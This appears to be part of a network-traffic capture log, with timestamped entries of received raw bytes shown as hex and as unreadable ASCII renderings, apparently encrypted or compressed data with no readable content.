                                                                                                                                                                                    2023-01-05 07:59:30 UTC16268INData Raw: a3 ac c1 ab 54 d0 fc 78 30 10 c2 73 83 72 70 b7 0d 5f c8 a8 b7 3e c8 36 33 9e 38 d3 28 06 52 19 e4 b0 d7 92 fe 82 31 ab 42 b1 e0 d7 45 1d 1b fd 75 51 10 29 80 05 97 f0 50 96 7a fc 6e 56 fb 26 42 39 cf a5 23 24 05 55 52 86 1e f9 d5 f7 25 07 69 70 bf 3f e5 01 31 b4 ef c4 59 73 8d 35 80 e4 d8 77 43 26 5a 43 61 ee 6d 7f af 3c a9 e6 53 64 cf 58 89 62 af 09 84 8c a1 2d 20 03 ee 44 3d f2 f0 9c ed 75 02 5e 4d 60 13 48 38 42 7f a9 31 1a 56 40 f3 33 83 69 96 19 ed 78 d4 29 e0 3b c1 5d 54 fe 44 e9 e6 a5 e7 88 2b 5f 7a 5b dc 81 6b 60 0e ec 77 cd 3f 0c 1e aa fc 5d 69 62 cd 6a 01 1b db 05 83 51 83 5b 96 68 98 06 4b 6b 49 47 95 85 2f 8f 14 4a ad 81 15 22 09 e5 0a c0 66 eb 50 36 af 5e f9 48 c5 bb 55 0a 71 2d 83 22 84 e1 83 b4 3c 01 2f cc b9 3c c9 06 df 33 e6 43 ac 28 db
                                                                                                                                                                                    Data Ascii: Tx0srp_>638(R1BEuQ)PznV&B9#$UR%ip?1Ys5wC&ZCam<SdXb- D=u^M`H8B1V@3ix);]TD+_z[k`w?]ibjQ[hKkIG/J"fP6^HUq-"</<3C(
                                                                                                                                                                                    2023-01-05 07:59:30 UTC16284INData Raw: 72 ca 48 7c 6d 8a e4 12 ac 25 6a 7a 59 8a 1e c1 a5 49 3d f8 ac 59 2e 18 3e 9d 11 5c ba 86 84 63 35 0e 4a 05 eb 0f e2 54 d1 3c 8d 11 c6 a0 27 57 f4 71 b2 44 79 8b 93 31 34 77 11 5c 4c 56 f4 af c2 8f a0 2c 6f 50 07 7f 4f fd 8b 3d 36 5b b4 b2 6f 33 1a 28 80 10 6e 88 91 ca 44 cf 2e 00 5d b5 a3 44 04 22 80 a1 8a 21 42 8b e8 59 1b 44 25 2b 7d 2c 32 7c 43 36 ca 9c 3b cc 58 e1 d5 02 7a b4 7d 08 91 e0 9a 45 fa 97 83 52 3a c1 64 31 dd e2 60 64 b7 5c 17 f7 da 30 cb af e1 a5 9d 58 39 0c 6d 45 7e 71 71 cc a5 7a 54 58 7b 72 70 ab cb 3c 9e 3c 35 e0 a5 a5 c4 0e 85 3e bb 81 46 60 44 0e 03 97 89 23 f3 25 ff a5 54 ab dd 28 77 bf c7 46 9f 82 fd a5 aa dc 30 20 ff 7a f0 d3 89 a8 2c f6 f3 e0 5a ab 93 71 1f ac 69 f0 7a 54 00 ad 53 31 f9 62 d2 f7 f3 33 06 22 70 de 7f 98 61 d6 57
                                                                                                                                                                                    Data Ascii: rH|m%jzYI=Y.>\c5JT<'WqDy14w\LV,oPO=6[o3(nD.]D"!BYD%+},2|C6;Xz}ER:d1`d\0X9mE~qqzTX{rp<<5>F`D#%T(wF0 z,ZqizTS1b3"paW
                                                                                                                                                                                    2023-01-05 07:59:30 UTC16300INData Raw: c6 d2 b1 e6 3a 18 a5 71 4c 46 64 78 61 7b 50 29 1b aa c1 cc 8f aa 5f 53 90 09 09 ff 2e 2e a6 9a 08 3d d5 41 bb 6d d4 f6 5f 7e e8 c5 5a ca 81 06 4d 0a 0d d2 fb 51 27 e0 14 dd c6 b5 4b f7 e0 60 58 b6 27 a4 7d 50 e0 8e 0c 07 4a d1 94 f4 34 46 19 ea c6 d2 91 3b 50 24 4a 69 c0 f5 da 19 2c 26 39 94 68 7b a7 b0 86 23 77 68 5c 07 2e 46 25 04 f6 1c 66 f4 0d ec 29 51 5f 97 77 f1 60 9a 43 e7 70 a3 f6 c8 03 1d e2 70 c8 82 0e 9d d5 49 4c fe 16 81 c6 7e 3d 1c 73 2c 10 d0 37 c2 c3 1b f8 ee 7d af 42 35 8c e0 b7 ee 28 5b 8e 2d 89 e4 b1 06 11 32 8d 77 6d b6 00 a5 8d 3f 83 22 42 dd f9 48 86 db 37 24 87 ed b7 e5 c6 ae 65 33 d8 26 00 03 fb 08 f0 e1 f8 46 e3 26 1d 45 8f 4c 3f c8 4b 7f 91 46 49 00 26 7d 24 24 8a b5 8e 1a 3f 6f 1e 4e 44 68 78 81 03 6a 3a 35 54 b8 a8 77 31 34 aa
                                                                                                                                                                                    Data Ascii: :qLFdxa{P)_S..=Am_~ZMQ'K`X'}PJ4F;P$Ji,&9h{#wh\.F%f)Q_w`CppIL~=s,7}B5([-2wm?"BH7$e3&F&EL?KFI&}$$?oNDhxj:5Tw14
                                                                                                                                                                                    2023-01-05 07:59:30 UTC16316INData Raw: 20 eb 41 31 68 9c d3 2a dc f3 59 c6 8c 64 33 42 00 de b0 c0 29 ca c7 7d 84 eb b8 c1 5e 5c 9e f2 78 a7 1f 56 9e f6 16 f6 b4 e9 d1 e0 cc 81 ee 9e 07 c9 21 c6 f6 cb 82 c3 a2 b8 38 27 d3 9e df d5 a2 a5 2c 21 e0 73 a4 30 3c 9c 56 81 a3 35 7a 68 9a c7 05 7a 9c 12 a1 f4 9d d8 2d 82 2e 21 6d eb 81 61 54 74 0f 87 ae 54 93 a6 09 a8 79 09 f1 03 7b bc 64 be cd 71 4c e2 e9 2e ba 01 53 b7 64 29 dd 46 a9 b5 b0 da 9b 1b ac 28 99 a6 44 60 ef fc d8 0c a9 09 6e e0 72 22 d6 80 c2 25 1f 4c 83 ef 0b f0 4f d5 a1 50 11 17 b6 73 f2 f1 7c 58 7d 88 e8 c8 48 8f 89 b9 a2 ce 55 7d 54 79 93 e1 b0 5f 61 d1 28 55 cc b3 1a 56 91 6e af 46 85 0e 21 1d b2 00 ec 52 f5 f9 b3 1d 12 d5 d5 bb ac f0 84 fc 30 a6 a4 7c 80 68 93 04 cf 28 a1 94 a5 26 ca 2a 63 7b 59 6c dc 54 4f 90 18 73 4e d1 1e f9 89
                                                                                                                                                                                    Data Ascii: A1h*Yd3B)}^\xV!8',!s0<V5zhz-.!maTtTy{dqL.Sd)F(D`nr"%LOPs|X}HU}Ty_a(UVnF!R0|h(&*c{YlTOsN
                                                                                                                                                                                    2023-01-05 07:59:30 UTC16332INData Raw: d5 1e be 39 1a 85 0e 99 e4 0c 6e 57 d0 33 15 65 58 f5 b5 47 2b 10 32 d2 42 a6 5c bd 94 3b ff 23 c8 26 78 ac 88 e0 3a ab 2f c8 4f b4 d2 15 ab 90 7d b9 e8 3d ea 84 5a 4e 08 87 5a ed 28 22 d5 06 1d 1a 19 f9 d1 47 f7 f5 e7 90 25 18 bb 1c ff bc 1d 99 a7 03 e4 b3 f8 c5 d0 11 48 c7 e8 e8 61 38 c6 7f b0 51 63 a0 00 ce 62 83 db c4 12 7f 64 12 6b 69 3c 7a c4 d9 ca 3a 9c 9d df 2c c5 15 3b 00 87 42 a1 20 ba 9a 5f 36 75 c2 d9 69 cd 42 81 5d 42 0c a2 91 35 72 e9 df 6e d9 4e cb f4 db ed 9e 7b 31 fd 8f 98 14 05 6a c3 9e 16 64 48 e5 14 a2 2b 7c 97 07 7b b2 ec ae 89 2f 07 aa f5 12 cf 30 b4 16 e1 ec 50 e4 c3 84 ef 3e 44 97 01 6e a7 ab c2 80 24 72 49 75 71 8a 54 b6 ad 40 d2 40 0f c0 07 d8 72 bb 37 2a 90 56 90 54 00 5d 34 32 5a b0 0e d4 91 b6 97 ba 70 15 4b 6a 48 3f ed 34 6e
                                                                                                                                                                                    Data Ascii: 9nW3eXG+2B\;#&x:/O}=ZNZ("G%Ha8Qcbdki<z:,;B _6uiB]B5rnN{1jdH+|{/0P>Dn$rIuqT@@r7*VT]42ZpKjH?4n
                                                                                                                                                                                    2023-01-05 07:59:30 UTC16348INData Raw: 0e 42 ef 30 85 86 d4 fd c4 0a 3c 32 08 b8 49 c0 ba 7e 30 05 a9 44 45 9b c1 8c e1 9a 9d fd 75 0a 49 34 68 0f 1d 41 ee ef 66 9a e8 cc 7c 5f ee 6f 2e 1b 5f ab ee 5d f7 1d e4 01 c0 db 21 e6 d6 e9 ff 01 84 d6 95 8c c2 d1 02 7e a2 85 4b df ac 55 94 5a 69 44 92 8e 28 be f6 a1 fb 77 4a 6f 74 c3 6d b8 a6 a3 75 a5 a5 61 e5 ff 94 c4 95 95 52 52 41 56 9d 2e bb e9 00 dc 9c 37 99 72 4e 49 35 bb f6 1f c3 02 cf c7 cc 2d ab 5e 5b c6 c8 44 a6 0f c4 8f 08 d0 97 04 fe a0 1b a1 41 c3 5a 21 92 fd ac 3c b7 76 ae 04 02 02 d4 6a f0 2c 0a 96 a4 91 57 de 2f 6d 58 87 22 19 2d d5 1c 09 66 75 e2 18 ef 55 72 ec 26 d1 ec 98 b1 9b c3 14 a2 c1 d8 d7 e5 00 58 2c 02 49 ca f7 c5 26 25 48 65 de 50 a8 3e 2c 35 5e 1b e9 83 01 1c 81 a7 f9 82 20 1d a5 83 5d e9 54 d2 9a ff 63 b0 2c 8f 63 f4 d2 a6
                                                                                                                                                                                    Data Ascii: B0<2I~0DEuI4hAf|_o._]!~KUZiD(wJotmuaRRAV.7rNI5-^[DAZ!<vj,W/mX"-fuUr&X,I&%HeP>,5^ ]Tc,c
                                                                                                                                                                                    2023-01-05 07:59:30 UTC16364INData Raw: 4b a9 14 17 8c 0c 16 d1 f7 d5 41 c6 16 a2 3b 7a 07 23 e0 e7 d4 24 e2 08 bd e0 13 57 b2 44 ce 92 3d 68 2a 9a 49 3a 2c 63 c5 f7 6f b8 85 e0 ee ae 17 76 e2 26 cd a0 23 24 5e 7a d6 b4 7a e2 41 ff d8 85 c9 da 4b 3f 0b 60 35 5b 38 39 be f9 14 95 06 05 d4 15 cb f0 1c b6 65 eb e2 b7 b3 f3 ae b1 34 17 a2 64 ce 2d 4c c0 7d 08 35 c7 2d d6 25 df 03 ac da 24 64 57 33 3e 79 0b f1 63 c0 d1 be a6 7f 88 28 df 8b f6 7e fa d5 39 37 f8 2f fa 8f 5e 66 6c 43 7c 2c 1d 6b b5 2a c6 f0 85 99 36 46 8c 3c 0e 11 f5 df 2b cb 0e a7 51 bc ac db a5 b5 1c d8 8b 57 7a 89 ed f2 32 8a ff 3d ef f2 31 ed f0 f6 35 3e 11 54 b7 bd cb a9 bc ba d5 a6 04 f4 4c 99 2b cc c0 10 3b 7a d5 e5 4a cb 4e 14 87 b8 c8 cc 4a b2 2d 4e a4 d8 2d 8d b2 f5 91 7b 1c ec 46 1f bd 0b cf b1 96 f7 e7 cd 82 0c 35 b1 39 6c
                                                                                                                                                                                    Data Ascii: KA;z#$WD=h*I:,cov&#$^zzAK?`5[89e4d-L}5-%$dW3>yc(~97/^flC|,k*6F<+QWz2=15>TL+;zJNJ-N-{F59l
                                                                                                                                                                                    2023-01-05 07:59:30 UTC16380INData Raw: 3a 27 a1 30 1a c7 22 e2 7f 50 71 7f 80 80 10 46 03 dc 05 93 35 74 1f 9d e2 03 82 65 96 f5 a3 93 78 ef ba 46 38 7a ce d0 ab 4e 53 9b ae 96 17 b9 1a 0b 21 3b 7b fb 14 aa f6 9c 01 51 e1 bc 67 fc fc e2 5e 9b 3c 64 13 ca 86 c5 04 da 0c cf b6 bc d5 cb 0c a3 14 c5 22 ab 50 ab ac ed ca a5 4e 1a 20 57 fb e8 9a 75 15 b5 fb 92 eb d3 87 68 15 11 6c 50 f4 6f d9 7b 79 a4 f3 ea fd fa 6b 10 0f ad 51 86 6d 58 f1 00 38 3f f0 49 03 fd 55 0c 3e 49 df 3d ad 44 96 9d a5 9b 30 9b f4 2d f5 4c 3c d0 c9 1e 81 3f 39 d3 92 51 e7 06 1c 32 c5 07 a5 00 34 38 28 7e c1 56 ee 66 c9 5f f6 fc 29 df aa c2 0f b0 75 61 d2 9a 3b 90 c8 f8 a8 f3 b2 cf e5 fc 86 f4 1d e8 63 11 53 19 be 7e ab 88 f8 2d ef 08 a7 aa 5a 77 2e 4c 1c c8 25 4d 72 b0 b0 43 76 c4 56 f9 37 78 60 2f ef 7e 39 69 f7 14 8b 97 4c
                                                                                                                                                                                    Data Ascii: :'0"PqF5texF8zNS!;{Qg^<d"PN WuhlPo{ykQmX8?IU>I=D0-L<?9Q248(~Vf_)ua;cS~-Zw.L%MrCvV7x`/~9iL
                                                                                                                                                                                    2023-01-05 07:59:30 UTC16396INData Raw: 9a 55 2e 50 c9 56 be 27 7f e9 d8 92 60 3d 26 e0 1a c5 2f b0 c1 3b 40 75 e3 e5 8a fd 72 4d 0a 89 97 d4 a4 2c 6d 79 4a 81 0d 3a a0 17 1e bc 98 6d a6 bc c2 a3 b9 ce 16 64 c9 c7 67 25 63 66 0f af 9d 56 3a 9c 35 06 c9 58 bc fe b5 09 7f 08 c3 18 2a f6 74 2f 8f 93 35 02 e3 88 40 db 4f 1b 95 7d 3c 7f 54 25 9c 1f dc 72 5c 52 6a b9 8a 82 e3 c6 bb 9a e9 c5 bd bc e8 b7 6a 23 31 ea 48 1b 54 94 4e 60 86 65 b3 29 40 ab 2a f4 f7 7e 77 8c ad a8 c6 7c b1 81 7d 6c 58 75 80 51 4d a4 5a 82 fd ee e2 d7 64 8b a4 b6 2b 46 38 7e 2d d4 d4 26 8d 8f ce d0 5c 11 a7 ea 9f 6e 8e c9 0c 81 bc c5 4c 7f a0 3c b0 d2 00 a0 bd 94 5d 9d 92 be 54 db 22 25 42 05 73 40 ab 9b b3 3b 7d c5 1d d5 e9 2d 2a d4 a1 68 31 d1 47 ce 04 de d6 21 fe 29 a0 dc 56 b1 10 fb ac 2e 8a 38 9a 61 60 b0 e6 1e 03 49 4e
                                                                                                                                                                                    Data Ascii: U.PV'`=&/;@urM,myJ:mdg%cfV:5X*t/5@O}<T%r\Rjj#1HTN`e)@*~w|}lXuQMZd+F8~-&\nL<]T"%Bs@;}-*h1G!)V.8a`IN
                                                                                                                                                                                    2023-01-05 07:59:30 UTC16412INData Raw: 45 0d 4c a5 f2 a9 ad c0 1f a8 78 8b a6 99 2e 10 69 44 cf 7b 71 97 0b d6 cf 61 a3 53 02 35 b9 63 e3 c1 6d e6 4b bc e3 02 9e 6a 8b 8c 38 e6 f6 34 98 17 5d 04 68 45 67 65 06 17 02 7a 16 ce 5a 47 33 90 f2 40 ff 01 16 71 6c 5c a3 be cd f9 d0 d4 54 ac de 24 61 96 ce 49 4f 77 93 38 fe 6f c1 82 54 29 bc 19 f8 80 10 f3 02 4a e4 df 80 50 c5 25 4e b4 04 b3 c3 68 a8 2c e8 d0 55 93 9b 7e bf ea fa d5 37 57 42 25 08 a7 a9 a6 d5 d8 24 fa a5 04 b6 a7 cf 3f c3 98 61 71 13 7a 02 94 e6 c2 e3 bc 24 13 bb 41 14 66 90 c0 be 2c 16 50 d5 e9 df cb 58 56 37 e1 dd 5c a2 48 95 38 62 dd f8 ca eb 4b f6 76 c8 e7 23 74 cb 53 bf 27 96 68 16 e6 2f 3c 94 aa 29 8d b4 07 47 69 9f e5 d4 ee 6d 46 b9 3a 8e a5 ea b9 2b b6 63 90 c3 8c d3 1a 91 f6 41 0d 82 d6 63 71 4b 9e ee 7a 6c da d1 35 65 18 73
                                                                                                                                                                                    Data Ascii: ELx.iD{qaS5cmKj84]hEgezZG3@ql\T$aIOw8oT)JP%Nh,U~7WB%$?aqz$Af,PXV7\H8bKv#tS'h/<)GimF:+cAcqKzl5es
                                                                                                                                                                                    2023-01-05 07:59:30 UTC16428INData Raw: 00 dc 6f e0 a2 bf 40 92 e3 86 28 a8 1b 7f 3b 8e cb 09 f6 83 0e 13 82 67 c1 0d b6 fd 21 b6 a4 6e 71 b7 8b bb 95 04 48 3e 37 46 82 d5 6c 9f 4b ef 69 d5 2e 64 f9 41 aa 53 a7 5a 13 bb 57 7a de b5 75 92 b9 79 73 3c 9c 2e 36 19 1d 69 73 44 1c 1d 0a 7f 28 e5 63 ca d7 0c fb ad dc 57 04 6f 84 0c 06 21 fd 13 a9 f6 a5 fb d2 5e d8 d6 88 f8 8a 71 fb bd ae 4e 14 e3 bb be 70 be f9 6e 16 66 9e 3b 95 29 de d9 7e 20 2c da 1d d4 a1 70 e4 c3 39 d8 36 6a ae ce 07 4e 31 d0 24 69 c0 07 2f 98 77 b1 6b 50 b8 d6 ed d4 47 25 ef 61 21 d2 6e 09 54 a1 d4 81 db 31 7a 2f a4 2e 46 48 43 c6 e4 dc e6 09 0f 6e 04 cb 1c e3 df 59 dc 56 65 f8 6e 5c 0d 20 11 45 03 63 67 19 01 1e 00 3f 6b 1b 3f 0a 9d fc 04 d8 e0 cd 89 2b 5b 7b 1d fb 34 0c ff bd 23 50 9e 62 7e 91 35 b7 a8 e2 2e 3a d6 f2 ab c2 79
                                                                                                                                                                                    Data Ascii: o@(;g!nqH>7FlKi.dASZWzuys<.6isD(cWo!^qNpnf;)~ ,p96jN1$i/wkPG%a!nT1z/.FHCnYVen\ Ecg?k?+[{4#Pb~5.:y
                                                                                                                                                                                    2023-01-05 07:59:30 UTC16444INData Raw: 67 34 d5 1c 9d 21 41 15 53 9d 33 92 e6 71 1e f7 15 da 08 35 ab e1 19 4f 40 5a 7a 93 95 29 3c bd de 9f ef 72 51 65 f9 c4 da 64 d9 fc d4 96 79 83 f2 40 f3 01 6d 1b 80 67 1c 80 84 d2 e5 fd b2 ab ec 18 92 92 42 b9 56 05 7e ad ca 00 b0 35 82 97 71 00 e9 4c 5d 97 41 4c 75 27 fb 01 63 c1 c5 b0 7c 9a 45 77 ad d9 f3 da 1b 05 b0 33 22 6d de 3c af 44 3e 01 8a 3d ad d8 68 99 0d 9f bc be 33 c7 3b 26 5a ae 5e 7b d6 53 f1 60 d6 77 b7 f4 31 28 ed dd 89 2e 67 fa 9d 11 9d 98 37 77 b9 e8 84 f1 6e 3b 1e e2 ca bf 9d 0b 34 32 85 fa 93 9f b9 ba c0 d6 18 b9 73 b9 9f fc bf ff 1c 74 67 1a da 13 bf 4e ca ff 2a 76 86 28 2c fa a1 4f 77 7a 18 63 ed 9b ef 77 29 f8 ce 89 30 36 a2 80 45 0e 04 cb c6 96 75 15 bf 2d ca 5b a7 63 aa bd 27 6b f1 36 6d a2 e9 29 3d 28 ff 30 c0 4c 9b 2e 1d d9 d8
                                                                                                                                                                                    Data Ascii: g4!AS3q5O@Zz)<rQedy@mgBV~5qL]ALu'c|Ew3"m<D>=h3;&Z^{S`w1(.g7wn;42stgN*v(,Owzcw)06Eu-[c'k6m)=(0L.
                                                                                                                                                                                    2023-01-05 07:59:30 UTC16460INData Raw: b8 6e f6 ae 07 98 02 1f fc 6e 40 ed 28 e3 7c 02 08 ac 71 d3 7b be 81 6c bf fd f8 e4 b3 d4 f7 6d 39 ae 85 fa 71 f8 43 3b e7 95 74 3d bd 31 8c 25 1f 80 c5 50 3d 54 87 a6 f0 03 fe 3b f7 c2 5c a5 85 8c b0 76 21 5d 20 7b 06 93 3c e1 b0 d0 5b f6 52 47 45 7d 7b a9 0b fb a7 7c 93 0b 3a 92 44 c3 45 9a 34 6d 0b 02 71 f5 ca 9d 55 c7 30 6a d6 b7 1c c1 95 e5 c1 8f ab 0d f1 25 34 6d 1d 76 b1 46 ce 9d 0d 6d a9 16 ad 2e e1 1c ec 64 0b 75 67 be da 67 37 da c5 ab 03 8a 55 78 b5 72 dd 41 4c 66 c7 25 fd e5 bc c4 8e 15 14 e4 ec 46 ec 8f 77 74 4b 76 06 c4 b1 bb 16 f6 59 b6 cf 84 00 32 59 82 cf 02 ee 85 41 38 b8 e3 52 db 38 6a f6 19 2b 12 f8 a3 e8 ff 99 77 54 dc b4 e5 45 a4 89 07 21 ce 26 fc c4 bb 78 5a c6 fd e1 a0 83 9e 7e 78 4f 70 d6 e6 20 26 56 46 67 d6 58 4c 17 11 62 2d 3a
                                                                                                                                                                                    Data Ascii: nn@(|q{lm9qC;t=1%P=T;\v!] {<[RGE}{|:DE4mqU0j%4mvFm.dugg7UxrALf%FwtKvY2YA8R8j+wTE!&xZ~xOp &VFgXLb-:
                                                                                                                                                                                    2023-01-05 07:59:30 UTC16476INData Raw: 98 29 99 8d e8 68 ed be 77 0a 16 3c e6 76 69 8c 5e bf 43 0a bc 17 b7 2a 8e 82 9c dc 10 1b 29 95 b8 d6 8b 29 d1 e1 5a af 58 90 e3 f8 2a 60 ba aa f3 79 a3 93 41 32 ef 87 aa e1 b2 cb f8 3a d0 a8 28 45 c8 7f b1 97 9e 5b c1 f8 7f 2e 5b 0d 7e 97 03 e4 d9 ce 8b 65 bc 94 d1 47 99 4f 22 ac dc 29 d4 a3 10 57 ce 7a e8 50 b5 e0 76 83 9f ce 63 e8 84 fb fa 98 82 47 4b 05 c2 ce ee 54 dc ba 49 19 db 54 f8 df ff e1 51 f3 0a d5 5b 8b 7e 6f 56 17 35 19 88 0f 70 ec 08 65 86 ff e7 5d 13 82 7f d3 b0 5d 89 09 92 12 14 af 0d d3 e2 49 68 3d 43 9b c6 fb 00 89 57 03 46 a3 ed d3 2e 13 ef a7 80 da cf 97 fd 6b 90 f1 59 71 46 0a 7f 43 23 c2 01 22 91 4a f8 21 8e 49 db 25 20 2a 84 fb cd f2 8f 99 78 fb 4a a9 11 48 9a 66 85 15 ee 9b b1 26 84 33 d7 63 94 85 51 50 94 64 ba 2e 6e b2 65 f2 79
                                                                                                                                                                                    Data Ascii: )hw<vi^C*))ZX*`yA2:(E[.[~eGO")WzPvcGKTITQ[~oV5pe]]Ih=CWF.kYqFC#"J!I% *xJHf&3cQPd.ney
                                                                                                                                                                                    2023-01-05 07:59:30 UTC16492INData Raw: db 81 ed da 60 65 b8 82 19 54 4b 16 d3 35 9f 61 c7 0a 8e 71 74 c4 e0 63 e7 05 d8 b1 d7 6b 5e 25 8d 28 ae a0 dc 95 c6 cd e8 7d 6a a9 f6 b2 bb f5 b9 f4 f5 80 28 65 ba d8 ce bf 84 b3 f8 e1 9e 82 c7 5f a3 81 a5 0b a0 c5 f2 24 b7 bd f3 73 c6 a5 a2 7e 1f d5 e6 18 dd 81 96 94 50 3e 2d ba 1b 70 d2 f1 ed 14 a4 e1 16 6f 56 71 1f 68 db ac 7b 33 f4 34 e0 e5 93 be 35 2d 68 44 78 4b 19 de 78 79 6a 74 8b 2d 01 d3 e8 5c 2a 1c 2f 7c 87 a8 ad e2 02 e6 83 1c b7 68 99 92 43 b5 24 db 04 85 af 52 7f 10 c3 2b c7 d1 64 20 09 e8 66 df 36 ad d9 79 8f b1 47 9c 63 34 f2 4c 96 44 ad e3 34 1f 22 f5 f6 1d 04 73 52 fb 22 e2 d2 4d aa 71 15 25 cb ea e6 3d 56 97 3c ba 58 5b ab 63 55 b9 81 24 24 af e6 95 53 3b 04 52 50 34 b8 c2 90 10 b0 a4 99 dc 23 81 0a 1d d8 9a 36 fe 93 2d 27 1f 44 e9 ac
                                                                                                                                                                                    Data Ascii: `eTK5aqtck^%(}j(e_$s~P>-poVqh{345-hDxKxyjt-\*/|hC$R+d f6yGc4LD4"sR"Mq%=V<X[cU$$S;RP4#6-'D
                                                                                                                                                                                    2023-01-05 07:59:30 UTC16508INData Raw: 82 39 36 b2 24 f3 43 d5 cd a7 5a 4d 28 30 1d 8d 36 ce ee 96 4d f4 60 7f b2 b7 28 9d d0 df ae 5a d0 27 19 4a e2 14 cd 91 fc 7e 0e 88 fd cc 41 12 54 11 cd 10 42 c5 b1 e8 3d bc d1 ae 95 77 d5 67 5d 9b ec 6a 09 fd c7 e2 ea 1a 41 7d 2c c6 68 52 28 6b 18 d0 00 d8 d1 07 66 f6 85 7f 1a ba 5b da cc 37 db ba 9a 0b d6 5d 55 29 a5 c6 5a 7c 24 22 ce 61 a8 71 2f 3b 4d 89 02 58 e1 dd 67 4d e5 28 de 8e 60 8b 0b 5b 9e 09 8d ce 99 a5 8b 1b 30 ed 57 2c 17 c6 2f da 51 7e 8e 64 44 57 6e d6 cd 8f f4 e1 78 62 6d 10 89 25 66 29 ac 95 50 60 ea 50 44 fb 1b 42 f1 aa 15 67 cc df 06 44 a6 bf a5 ed dd 0a b5 91 98 d7 42 01 f8 03 b2 1a b6 9f 15 c5 49 9e 1c ff 86 74 ef 7c e7 3e d5 b9 1d 22 62 c9 9b 68 a6 a4 c3 12 97 4c b7 ae f6 aa 67 8b 3a 1b cc 21 03 6d 06 3b 7d f9 15 f5 98 b9 15 58 c5
                                                                                                                                                                                    Data Ascii: 96$CZM(06M`(Z'J~ATB=wg]jA},hR(kf[7]U)Z|$"aq/;MXgM(`[0W,/Q~dDWnxbm%f)P`PDBgDBIt|>"bhLg:!m;}X
                                                                                                                                                                                    2023-01-05 07:59:30 UTC16524INData Raw: e5 43 e1 ef 3b 72 cf 18 bb 38 0a 8e 80 b4 56 28 35 05 b6 af 27 f3 bb 97 37 a6 52 ac b2 f8 16 5a 0c 53 c2 b2 a0 03 01 bf 7e fd 80 49 74 87 cd e2 a3 e7 b3 b5 6e 78 26 fd 4a d9 26 45 8e 60 c9 8b 0e 26 2c 2f 59 1f 64 ba 04 b3 07 f2 46 b1 7e cb 01 a8 17 3a d1 db de 98 06 06 f8 3e ba 92 87 94 12 28 ef cf c8 d7 ee 86 b4 34 4d 46 43 18 86 61 4a 80 42 62 3f 1a c1 5b 0f d7 ab 1c 80 d1 d4 cf 3f b9 53 89 ad f3 9b 07 51 73 ac f1 f0 79 3d dc 0e dc e7 17 45 21 c7 da be 68 01 ba 23 ff 4c 4a a1 fe 7c b1 8c 61 0e f4 43 62 eb ae c0 80 6d 6f 7f 6d 60 da 76 05 62 95 4d 0b b8 c7 8a ed 98 34 d1 55 ee 01 f0 61 2c a0 1d ce e9 8f 38 ad 4e 5e 6f 8d ec 9f a4 4b 97 ca 69 d9 f0 ed da 98 bc e0 83 f1 1b e7 20 31 b6 e6 46 19 41 54 5c 76 71 39 3d 54 ce f4 c0 b8 b5 4e 1d 31 57 40 76 61 51
                                                                                                                                                                                    Data Ascii: C;r8V(5'7RZS~Itnx&J&E`&,/YdF~:>(4MFCaJBb?[?SQsy=E!h#LJ|aCbmom`vbM4Ua,8N^oKi 1FAT\vq9=TN1W@vaQ
                                                                                                                                                                                    2023-01-05 07:59:30 UTC16540INData Raw: da 2c 74 67 39 0a 02 ae f9 bc 45 0a 6d aa d1 05 c6 af 16 88 b5 c1 93 1e bc 93 cc b3 78 22 0a 5f 1b 81 7e ff c3 95 69 b2 f1 1b b7 2f f7 6d cd 91 7b 68 37 a3 4a c5 a5 ce 90 d3 a9 c1 47 69 2a 2b 9a c0 51 c0 20 8a 98 5b 62 66 a8 72 16 b0 7c a1 31 b6 8f 36 be 09 5f 21 b2 db 4f 82 18 ba 97 fe b0 8a fb 3f 57 6c db 3a e8 e5 5b a6 16 85 ac 57 ad ad 34 23 57 ea b2 01 79 ee a0 bb 90 af 71 79 5c fe 7e e7 25 15 18 6b f8 30 65 2f 71 0f f4 90 97 2a de c4 3b f1 4a 12 a1 94 7a c7 da ba 34 87 67 68 26 2d 63 bb ce c9 57 f8 58 f9 d8 d2 7e ca ac 54 65 06 25 43 0d b8 1d 27 65 e5 7e 95 1e 58 24 df 37 99 86 44 d7 28 e6 78 a0 20 bf da 06 cf 2e d2 e5 98 30 cd a9 89 85 35 c4 7c e3 78 08 44 6b 58 cf 30 98 6b f3 08 16 84 ba bb a7 47 cb d9 0a f2 5f 1f 32 68 c5 ca 82 f1 2b e0 84 65 9e
                                                                                                                                                                                    Data Ascii: ,tg9Emx"_~i/m{h7JGi*+Q [bfr|16_!O?Wl:[W4#Wyqy\~%k0e/q*;Jz4gh&-cWX~Te%C'e~X$7D(x .05|xDkX0kG_2h+e
                                                                                                                                                                                    2023-01-05 07:59:30 UTC16556INData Raw: d7 e0 97 ae b0 e0 d1 01 76 df 82 30 28 89 2a fa de c6 d6 4f cd c0 da ac e7 1c 13 3c 9a 2c ec 17 dd 8f 4e f4 6c 36 8b d1 21 57 4f be c3 96 9a 25 59 0a c8 59 37 7a 0c 45 c6 59 7a 79 06 c1 c5 bf f7 86 c3 00 be 03 52 c4 7b 04 d9 ae ee 2f 42 9c 46 b9 e1 6c 23 18 2e bb e2 90 ea 7f 70 f4 ba a5 60 f4 cc 35 47 55 52 e3 b5 e5 78 74 98 ee 30 87 61 ab ff 05 a1 5e d5 c7 1a 22 0e 0e e4 42 4e 79 00 87 28 9a 79 88 d1 5f c4 18 ab f2 a5 72 94 67 5a 36 9b 36 7b 6b 5c 01 18 c0 5a 01 1c 2c 21 57 dc d8 77 4b b6 76 ab c5 be bb 3c 35 b2 04 f2 7b 34 68 48 77 61 e7 2c 40 dc e0 a3 27 0c c2 61 b1 be 48 5f e0 89 33 90 eb 61 6a 6f 59 5d c9 f1 48 b7 3c 90 f1 0a f9 91 4e 50 0f 3b ed b9 c1 39 cf 52 15 e6 25 06 7f a3 29 21 22 c0 65 a8 f9 e9 1f eb e7 91 66 a9 1c b8 a5 14 38 cb e0 83 4d 72
                                                                                                                                                                                    Data Ascii: v0(*O<,Nl6!WO%YY7zEYzyR{/BFl#.p`5GURxt0a^"BNy(y_rgZ66{k\Z,!WwKv<5{4hHwa,@'aH_3ajoY]H<NP;9R%)!"ef8Mr
